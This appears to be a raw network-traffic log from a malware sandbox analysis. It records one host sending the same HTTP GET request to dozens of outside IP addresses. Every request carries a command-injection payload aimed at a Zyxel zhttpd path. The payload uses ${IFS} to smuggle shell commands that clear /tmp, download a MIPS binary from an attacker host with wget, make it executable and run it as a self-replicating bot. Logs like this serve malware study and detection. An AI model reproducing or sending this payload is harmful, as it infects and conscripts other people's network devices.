                                      Jan 19, 2024 17:29:19.511084080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1043192.168.2.1447170124.111.160.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511121035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1044192.168.2.1454818122.170.119.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511157990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1045192.168.2.1437704163.235.192.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511202097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1046192.168.2.1449182156.71.68.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511240959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1047192.168.2.1451818174.227.218.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511276007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1048192.168.2.1432974218.126.81.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511311054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1049192.168.2.1439194148.113.188.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511346102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1050192.168.2.1449900155.162.40.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511395931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1051192.168.2.143497890.152.146.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511429071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1052192.168.2.145816052.204.127.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511473894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1053192.168.2.1450224110.48.15.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511514902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1054192.168.2.1436702193.208.165.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511550903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1055192.168.2.143827073.236.64.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511596918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1056192.168.2.1453032173.21.200.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511629105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1057192.168.2.1441744158.169.147.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511672974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1058192.168.2.1432830176.101.183.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511689901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1059192.168.2.143543451.49.8.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511758089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1060192.168.2.1458678222.29.179.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511776924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1061192.168.2.1451278163.35.220.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511850119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1062192.168.2.1436014189.2.116.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511871099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1063192.168.2.144436254.24.5.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511909962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1064192.168.2.1460608172.171.75.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511955023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1065192.168.2.143603012.112.223.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511989117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1066192.168.2.1440280196.210.29.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512018919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1067192.168.2.1458096162.54.172.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512067080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1068192.168.2.1444072101.173.85.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512094975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1069192.168.2.1445944192.151.41.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512125015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1070192.168.2.144129666.154.231.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512165070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1071192.168.2.1434356117.179.105.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512197971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1072192.168.2.1442860150.101.53.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512244940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1073192.168.2.1445362152.109.171.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512286901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1074192.168.2.143914875.104.233.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512335062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1075192.168.2.1435010211.129.34.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512357950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1076192.168.2.143688463.41.61.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512387991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1077192.168.2.1437748217.107.32.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512425900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1078192.168.2.144668498.171.42.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512465954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1079192.168.2.143339671.3.186.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512506962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1080192.168.2.1453546167.4.132.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512533903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1081192.168.2.1433764201.48.87.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512568951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1082192.168.2.1440576147.231.193.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512625933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1083192.168.2.145895646.230.41.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.512670040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1084192.168.2.145651817.138.86.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516210079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1085192.168.2.1449904121.30.236.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516232014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1086192.168.2.1437386146.76.73.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516279936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1087192.168.2.1452490101.159.18.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516323090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1088192.168.2.14486542.248.247.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516370058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1089192.168.2.1434552159.46.46.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516427040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1090192.168.2.144392499.194.171.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516446114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1091192.168.2.1433256169.28.37.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516478062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1092192.168.2.1448438189.247.209.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516499996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1093192.168.2.143457868.191.234.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516561985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1094192.168.2.143835452.215.47.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.516606092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1095192.168.2.1441178183.161.63.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520592928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1096192.168.2.1449396135.124.116.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520617008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1097192.168.2.1439500153.128.86.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520673037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1098192.168.2.1441594209.118.106.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520709038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1099192.168.2.145715280.217.198.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520751953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1100192.168.2.1433764190.16.153.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520765066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1101192.168.2.143923637.124.190.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520840883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1102192.168.2.143625690.216.111.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520878077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1103192.168.2.1455980147.89.91.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520915031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1104192.168.2.145451012.207.237.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520957947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1105192.168.2.145247068.236.109.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.520994902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1106192.168.2.1456404129.34.31.136443
                                      TimestampBytes transferredDirectionData
